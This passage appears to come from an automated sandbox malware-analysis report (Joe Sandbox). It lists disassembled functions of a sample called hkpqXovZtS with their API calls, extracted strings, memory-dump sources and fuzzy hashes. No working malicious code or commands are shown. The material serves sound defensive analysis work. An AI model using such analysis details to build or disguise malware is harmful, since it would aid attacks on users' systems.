Part of subcall function 0041C2DE: __NMSG_WRITE.LIBCMT ref: 0041C308
Part of subcall function 0041C2DE: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001), ref: 0041C355

_wcscpy.LIBCMT ref: 00418957
_wcslen.LIBCMT ref: 0041895D
_wcscpy.LIBCMT ref: 004189A5

Strings

, xrefs: 00418975
<br>, xrefs: 0041899D
<style>body{font-family:"Arial";font-size:12;}</style>, xrefs: 00418951
 , xrefs: 004189DA

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: _wcscpy_wcslen$AllocateHeap_malloc
String ID: $ $<br>$<style>body{font-family:"Arial";font-size:12;}</style>
API String ID: 2405444336-406990186
Opcode ID: 8ffd512121a4bce5513adb12e64604f1f0251d70d853ce1b00fe6af10de29143
Instruction ID: 2c1cdc7596912b9ae3e5a13e1f3b5786512cf4ed6d5c0e0c2ffc7dfa181cc720
Opcode Fuzzy Hash: 8ffd512121a4bce5513adb12e64604f1f0251d70d853ce1b00fe6af10de29143
Instruction Fuzzy Hash: E721F8B5950344A6CB20AB54DC42AFE77B8EF40328B20401FE481A7290EBBCADD1C3DD

Function 00405099 Relevance: 16.6, APIs: 11, Instructions: 94COMMON

Download Yara Rule

APIs

_wcscpy.LIBCMT ref: 004050B7
_wcslen.LIBCMT ref: 004050BF
_wcscpy.LIBCMT ref: 004050CF
_wcslen.LIBCMT ref: 004050D5
_wcscpy.LIBCMT ref: 004050ED
_wcslen.LIBCMT ref: 004050F3
_wcscpy.LIBCMT ref: 00405102
_wcslen.LIBCMT ref: 00405108
_memset.LIBCMT ref: 0040511D
GetOpenFileNameW.COMDLG32(?,?,?,?,?,?,000000A2), ref: 00405171
GetOpenFileNameW.COMDLG32(?,?,?,?,?,?,000000A2), ref: 0040519D

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: _wcscpy_wcslen$FileNameOpen$_memset
String ID:
API String ID: 2318761785-0
Opcode ID: d4d160a5a99151fc53f3776d17938c5c1abe38bd93845d617e3507f21d755f62
Instruction ID: 7ff7d73551e11c8291ab67cdb52b17aaa0b2af9189deb6198912616bcef33b7b
Opcode Fuzzy Hash: d4d160a5a99151fc53f3776d17938c5c1abe38bd93845d617e3507f21d755f62
Instruction Fuzzy Hash: DB31D571900659ABCB11EFA9DC46ACF7BB8DF44354F10042BF904B7241DB389999CBE9

Function 022A74D6 Relevance: 15.1, APIs: 10, Instructions: 69COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 022A74EC

Part of subcall function 022A7A35: HeapFree.KERNEL32(00000000,00000000,?,022A6300), ref: 022A7A4B
Part of subcall function 022A7A35: GetLastError.KERNEL32(?,?,022A6300), ref: 022A7A5D

_free.LIBCMT ref: 022A74F8
_free.LIBCMT ref: 022A7503
_free.LIBCMT ref: 022A750E
_free.LIBCMT ref: 022A7519
_free.LIBCMT ref: 022A7524
_free.LIBCMT ref: 022A752F
_free.LIBCMT ref: 022A753A
_free.LIBCMT ref: 022A7545
_free.LIBCMT ref: 022A7553

Memory Dump Source

Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 1cdc5067381a7bd1af707b862421276f76a21733c0535646f00d30873fffd5b8
Instruction ID: cf89c72935c9b6de2e9a11cb675f2a5172e6f64d74dd08a61f0e1fe1ad5c90b1
Opcode Fuzzy Hash: 1cdc5067381a7bd1af707b862421276f76a21733c0535646f00d30873fffd5b8
Instruction Fuzzy Hash: B721A77A910208BFCB01EFE8C894DDEBBB9AF08340B4181A6A5169B525DB35DB458F84

Function 022B1613 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 147COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlDecodePointer.NTDLL(?), ref: 022B162C

Strings

asin, xrefs: 022B1759
log10, xrefs: 022B166E, 022B167D
log, xrefs: 022B1689, 022B1698
exp, xrefs: 022B16AB, 022B1710
pow, xrefs: 022B16CA, 022B1774, 022B17C1
sqrt, xrefs: 022B176B
acos, xrefs: 022B1762

Memory Dump Source

Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd

Similarity

API ID: DecodePointer
String ID: acos$asin$exp$log$log10$pow$sqrt
API String ID: 3527080286-3064271455
Opcode ID: 1cbb6359fac53526fea43d4624e3d7967483e9a318a70d15ccb5c825f90ed7da
Instruction ID: af1d5d08ea95af10b08e5d46dfdcbbc3a8b17e79f2ecb54a9f9c0102a0e8c4a7
Opcode Fuzzy Hash: 1cbb6359fac53526fea43d4624e3d7967483e9a318a70d15ccb5c825f90ed7da
Instruction Fuzzy Hash: 6251AA71A2060ACBDF128FE8E56C1EEBBB4FF05388F450085D885A7A6CCB748534DB50

Function 00423F75 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 129libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 00423FB9

Part of subcall function 0041D9AA: TlsGetValue.KERNEL32(00000000,?,0041DA23,00000000,00423F85,0044AB78,00000000,00000314,?,00420CD2,0044AB78,Microsoft Visual C++ Runtime Library,00012010), ref: 0041D9BC
Part of subcall function 0041D9AA: TlsGetValue.KERNEL32(00000007,?,0041DA23,00000000,00423F85,0044AB78,00000000,00000314,?,00420CD2,0044AB78,Microsoft Visual C++ Runtime Library,00012010), ref: 0041D9D3

GetProcAddress.KERNEL32(00000000,00000000), ref: 00423FD6

Part of subcall function 0041D9AA: GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 0041DA04

GetProcAddress.KERNEL32(00000000,00000000), ref: 00423FEB
GetProcAddress.KERNEL32(00000000,00000000), ref: 00424000
GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 00424018

Strings

GetProcessWindowStation, xrefs: 00424012
USER32.DLL, xrefs: 00423F98
MessageBoxA, xrefs: 00423FB3

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: AddressProc$Value
String ID: GetProcessWindowStation$MessageBoxA$USER32.DLL
API String ID: 1216973216-2247880650
Opcode ID: 2a265f664f7c42708469a1e2f417818f182c4ada4f241b82a6a32059f33f07f6
Instruction ID: 93fbe99845333f5db7f92e93949936f57448bc0fb4e0f10d09b70ea8315728cb
Opcode Fuzzy Hash: 2a265f664f7c42708469a1e2f417818f182c4ada4f241b82a6a32059f33f07f6
Instruction Fuzzy Hash: B34187B1E00225A6DB10AFB6AC05A6F7AE8EF81754B50442FF944D3254DF7CD881C69E

Function 0040A3E5 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 119COMMON

Download Yara Rule

APIs

Part of subcall function 0040A2AE: _wcsrchr.LIBCMT ref: 0040A2C2

_wcslen.LIBCMT ref: 0040A41B
_wcscpy.LIBCMT ref: 0040A450

Part of subcall function 00410850: _wcslen.LIBCMT ref: 00410856
Part of subcall function 00410850: _wcsncat.LIBCMT ref: 00410870

_wcslen.LIBCMT ref: 0040A490
_wcscpy.LIBCMT ref: 0040A502

Strings

.rar, xrefs: 0040A3FC
sfx, xrefs: 0040A43B
rar, xrefs: 0040A44A
exe, xrefs: 0040A42C

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: _wcslen$_wcscpy$_wcsncat_wcsrchr
String ID: .rar$exe$rar$sfx
API String ID: 1023950463-630704357
Opcode ID: 168b9255e32ce3a3b65e82a87f7de2f16222fbebbb3b242f1905199bff5d2360
Instruction ID: 20c2214daff69375ecb729738a606a90611832925fb8d322f336f880b4a91c57
Opcode Fuzzy Hash: 168b9255e32ce3a3b65e82a87f7de2f16222fbebbb3b242f1905199bff5d2360
Instruction Fuzzy Hash: 89312835140320A5C724AB259C89A7B7398DF44754F21483FF842BB1D2EBBC88E6D25F

Function 0041DB11 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 58libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 0041DB57
GetProcAddress.KERNEL32(00419D04,DecodePointer), ref: 0041DB67
InterlockedIncrement.KERNEL32(?), ref: 0041DB96
___addlocaleref.LIBCMT ref: 0041DBC8

Strings

EncodePointer, xrefs: 0041DB4B
KERNEL32.DLL, xrefs: 0041DB1D, 0041DB22, 0041DB2D
DecodePointer, xrefs: 0041DB5F
yB, xrefs: 0041DB3A

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: AddressProc$IncrementInterlocked___addlocaleref
String ID: yB$DecodePointer$EncodePointer$KERNEL32.DLL
API String ID: 320354791-36624002
Opcode ID: f158d1c87b7404b582db598389b9a5af448d1a3a74bab96e753a02af75644d9c
Instruction ID: b59c708ac32c3afeb84f4e6cd8855df30e9afe7776d71f47958d32bd84706c8d
Opcode Fuzzy Hash: f158d1c87b7404b582db598389b9a5af448d1a3a74bab96e753a02af75644d9c
Instruction Fuzzy Hash: FD11A5B1A487019BD720AF36DC01B9ABBE4AF04314F50455FE4A997391CB78AA81CB5C

Function 022A8FD9 Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 317fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(5B5E5FC0,00000000,?), ref: 022A9021
__fassign.LIBCMT ref: 022A9206
__fassign.LIBCMT ref: 022A9223
WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 022A926B
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 022A92AB
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 022A9353

Strings

kL, xrefs: 022A8FE4

Memory Dump Source

Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd

Similarity

API ID: FileWrite__fassign$ConsoleErrorLastOutput
String ID: kL
API String ID: 1735259414-2496334608
Opcode ID: 26eb9c308c7c62252109c7aead1df882b61c0caf63e4ebe790a120fcf6691c02
Instruction ID: 7d0585bb493213fbda252d6e64be4e498f4568731e23cdafcf35e1b06d6db178
Opcode Fuzzy Hash: 26eb9c308c7c62252109c7aead1df882b61c0caf63e4ebe790a120fcf6691c02
Instruction Fuzzy Hash: D4C1BF75D102589FCF10CFE9C8949EDBBB5AF48308F2841AAE815FB645D7319946CF50

Function 0040EB90 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 134COMMON

Download Yara Rule

APIs

Part of subcall function 00409E73: _wcslen.LIBCMT ref: 00409E79
Part of subcall function 00409E73: _wcscat.LIBCMT ref: 00409E98

_swprintf.LIBCMT ref: 0040EBE9

Part of subcall function 0040B8BD: __vswprintf_c_l.LIBCMT ref: 0040B8D0

SetDlgItemTextW.USER32(?,00000066,?), ref: 0040EC0B
_wcschr.LIBCMT ref: 0040EC3E
_wcscpy.LIBCMT ref: 0040EC82
_wcscpy.LIBCMT ref: 0040ECAB
_wcscpy.LIBCMT ref: 0040ECBE

Strings

%s%s%d, xrefs: 0040EBC6, 0040EBE0

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: _wcscpy$ItemText__vswprintf_c_l_swprintf_wcscat_wcschr_wcslen
String ID: %s%s%d
API String ID: 2709753399-1000756122
Opcode ID: 3c31340004b8bf789c4987741b75b5355be1984d5082fc00c233e2affe1969a9
Instruction ID: e65d78a6c3a695d06915e74f3048f0d8e8369ebe84acbf0f567f7489278a11bb
Opcode Fuzzy Hash: 3c31340004b8bf789c4987741b75b5355be1984d5082fc00c233e2affe1969a9
Instruction Fuzzy Hash: EC5184B280015D9ADB21DB61DC44FEE77B8FF04308F0444BBE609F7191E7799A988B59

Function 0040CE40 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 80COMMON

Download Yara Rule

APIs

SelectObject.GDI32(00000000,?), ref: 0040CEA6
SelectObject.GDI32(?,?), ref: 0040CEB1
SelectObject.GDI32(00000000,?), ref: 0040CED9
SelectObject.GDI32(?,?), ref: 0040CEE1
DeleteDC.GDI32(00000000), ref: 0040CEEA
DeleteDC.GDI32(?), ref: 0040CEEF

Strings

@L(tH.G, xrefs: 0040CE52

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: ObjectSelect$Delete
String ID: @L(tH.G
API String ID: 119191458-690434681
Opcode ID: b5068a9bc3bda6569274045b2a10aff9f09a18750b8383e27909a8e8d72d2b25
Instruction ID: abfd82eaafa14a910ec27d7b9ec10ad6157ed40cf37bddc85fb870bed2e29a72
Opcode Fuzzy Hash: b5068a9bc3bda6569274045b2a10aff9f09a18750b8383e27909a8e8d72d2b25
Instruction Fuzzy Hash: 4421A37290021CFBCF119FA6CC45CDEBFBAFB49350B10546AF91462121C7359A21EBA4

Function 022A8577 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

Strings

ext-ms-, xrefs: 022A85E2
kL, xrefs: 022A857C
api-ms-, xrefs: 022A85CE

Memory Dump Source

Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd

Similarity

API ID:
String ID: api-ms-$ext-ms-$kL
API String ID: 0-1454199919
Opcode ID: 7038f207f03575411c0d6c5e5a3c19ffc687549f563f7fda9528c5dcb778d0b1
Instruction ID: 7a66139eb47f586873424de04b3fe21af535e4fa65ffeb31782cd660facb6588
Opcode Fuzzy Hash: 7038f207f03575411c0d6c5e5a3c19ffc687549f563f7fda9528c5dcb778d0b1
Instruction Fuzzy Hash: 15210071D71221E7EF228AECAC58B6A77699F00F64F150550EC16E7584E770DD10C5E3

Function 0040D600 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 73COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 0040D614

Part of subcall function 0041C2DE: __FF_MSGBANNER.LIBCMT ref: 0041C301
Part of subcall function 0041C2DE: __NMSG_WRITE.LIBCMT ref: 0041C308
Part of subcall function 0041C2DE: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001), ref: 0041C355

_wcslen.LIBCMT ref: 0040D654
_wcscat.LIBCMT ref: 0040D66B
_wcslen.LIBCMT ref: 0040D671
_wcscpy.LIBCMT ref: 0040D69F

Strings

}, xrefs: 0040D643
lB, xrefs: 0040D620

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: _wcslen$AllocateHeap_malloc_wcscat_wcscpy
String ID: lB$}
API String ID: 2020890722-3886410931
Opcode ID: 61bdf308878c9fcf69c6b2b0224747f1d0ad288e69c1be1bf6ea8e92dae5e1d9
Instruction ID: bd52086ed73c2d65d5c10d9766c04ca50ba83bbbb0247cd22e628ce0dbe0cb87
Opcode Fuzzy Hash: 61bdf308878c9fcf69c6b2b0224747f1d0ad288e69c1be1bf6ea8e92dae5e1d9
Instruction Fuzzy Hash: E011EB31D0071A59E725BAD0C885BEB73A8DF00354F50047BE648A22D2E7BD9D8CC69C

Function 022A1C72 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 64COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F4,D:\work\ssprotect\branches\2.x-dev-java\src\compiler\shell\plugin\overlay\mhook\disasm-lib\disasm.c,00000036,022B3318), ref: 022A1C92
GetFileType.KERNEL32(00000000), ref: 022A1CA4
swprintf.LIBCMT ref: 022A1CC5
WriteConsoleW.KERNEL32(00000000,?,?,?,00000000), ref: 022A1D02

Strings

kL, xrefs: 022A1C7D
Assertion failed: %Ts, file %Ts, line %d, xrefs: 022A1CBA
D:\work\ssprotect\branches\2.x-dev-java\src\compiler\shell\plugin\overlay\mhook\disasm-lib\disasm.c, xrefs: 022A1C8C

Memory Dump Source

Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd

Similarity

API ID: ConsoleFileHandleTypeWriteswprintf
String ID: Assertion failed: %Ts, file %Ts, line %d$D:\work\ssprotect\branches\2.x-dev-java\src\compiler\shell\plugin\overlay\mhook\disasm-lib\disasm.c$kL
API String ID: 2943507729-378192037
Opcode ID: 2f8bde7bfe986f47d06a0e6f59bf52659c8c86e08d0f494af105ca06f6629c1e
Instruction ID: 368b6c031ba0aa28bb25e0da4c02474c7f067e3968c2f242873187c967ef6a68
Opcode Fuzzy Hash: 2f8bde7bfe986f47d06a0e6f59bf52659c8c86e08d0f494af105ca06f6629c1e
Instruction Fuzzy Hash: 4E115775900109ABCB20EFA9DC48AEF77BDDF44320F504988FE1AD7484DB30A9568BA4

Function 0040A544 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 63COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 0040A56B

Part of subcall function 0040B8BD: __vswprintf_c_l.LIBCMT ref: 0040B8D0

_wcschr.LIBCMT ref: 0040A589
_wcschr.LIBCMT ref: 0040A599
_wcsncpy.LIBCMT ref: 0040A5BF

Strings

%s.%d.tmp, xrefs: 0040A549
%c:\, xrefs: 0040A561

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: _wcschr$__vswprintf_c_l_swprintf_wcsncpy
String ID: %c:\$%s.%d.tmp
API String ID: 2474501127-1021493711
Opcode ID: 13023c835e085818cff9dbbafa42bb21a44b684dcc68a1ed31b204af2ebc45ec
Instruction ID: 6eb9db36f88ceb87230377d65e12d3b7c7bd282f19d30ce67c10a7d98d8e666a
Opcode Fuzzy Hash: 13023c835e085818cff9dbbafa42bb21a44b684dcc68a1ed31b204af2ebc45ec
Instruction Fuzzy Hash: 4A01C02361431179D620AA269C06D5B63FCEF85361B54883FF485E71C1EA38D8A4C2BE

Function 00424252 Relevance: 10.7, APIs: 7, Instructions: 169COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(00000001,0042791C,00000001,?,00001006,00001004,?,?,?,?,0042443C,00000001,?,00000000,?,?), ref: 00424293
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,00001006,00001004,?,?,?,?,0042443C,00000001,?,00000000), ref: 004242F8
_malloc.LIBCMT ref: 0042432D
_memset.LIBCMT ref: 0042434D
MultiByteToWideChar.KERNEL32(00000000,00000001,?,00000000,00000000,00000000,?,?,00000000,?,00000001,00000000,00000000,?,?,00000000), ref: 00424362
__freea.LIBCMT ref: 0042437A
___convertcp.LIBCMT ref: 004243C5

Part of subcall function 00424799: GetCPInfo.KERNEL32(?,00000000,?,00000000,00000000,?,?,?,?,0042443C,00000001,?,00000000,?,?,?), ref: 004247E4
Part of subcall function 00424799: GetCPInfo.KERNEL32(?,00000001,?,0042443C,00000001,?), ref: 004247FD
Part of subcall function 00424799: _strlen.LIBCMT ref: 0042481B
Part of subcall function 00424799: _memset.LIBCMT ref: 00424893
Part of subcall function 00424799: MultiByteToWideChar.KERNEL32(?,00000001,?,0042443C,?,00000000,?,?,?,?,?,?,?,0042443C,00000001,?), ref: 004248AA
Part of subcall function 00424799: WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,0042443C), ref: 004248C5

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: ByteCharMultiWide$Info_memset$ErrorLast___convertcp__freea_malloc_strlen
String ID:
API String ID: 2103348365-0
Opcode ID: 0c3878dd51481ebc2fabe7f109d7a724efcf0643c35a273e57e78dfd4a062cb4
Instruction ID: dd6d72a3f82dc0a27b31079b9578b86ef109fb9b0ddb421b3ca8fc5724d51598
Opcode Fuzzy Hash: 0c3878dd51481ebc2fabe7f109d7a724efcf0643c35a273e57e78dfd4a062cb4
Instruction Fuzzy Hash: A751907170012AEFDF10DFA5EC819AF3BA9EB88354B91042AFD10D7250D738CD618BA8

Function 00418D0E Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 157COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00418D1A
_malloc.LIBCMT ref: 00418D24

Part of subcall function 0041C2DE: __FF_MSGBANNER.LIBCMT ref: 0041C301
Part of subcall function 0041C2DE: __NMSG_WRITE.LIBCMT ref: 0041C308
Part of subcall function 0041C2DE: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001), ref: 0041C355

Strings

<br>, xrefs: 00418DF1
</style>, xrefs: 00418E44
<style>, xrefs: 00418E29
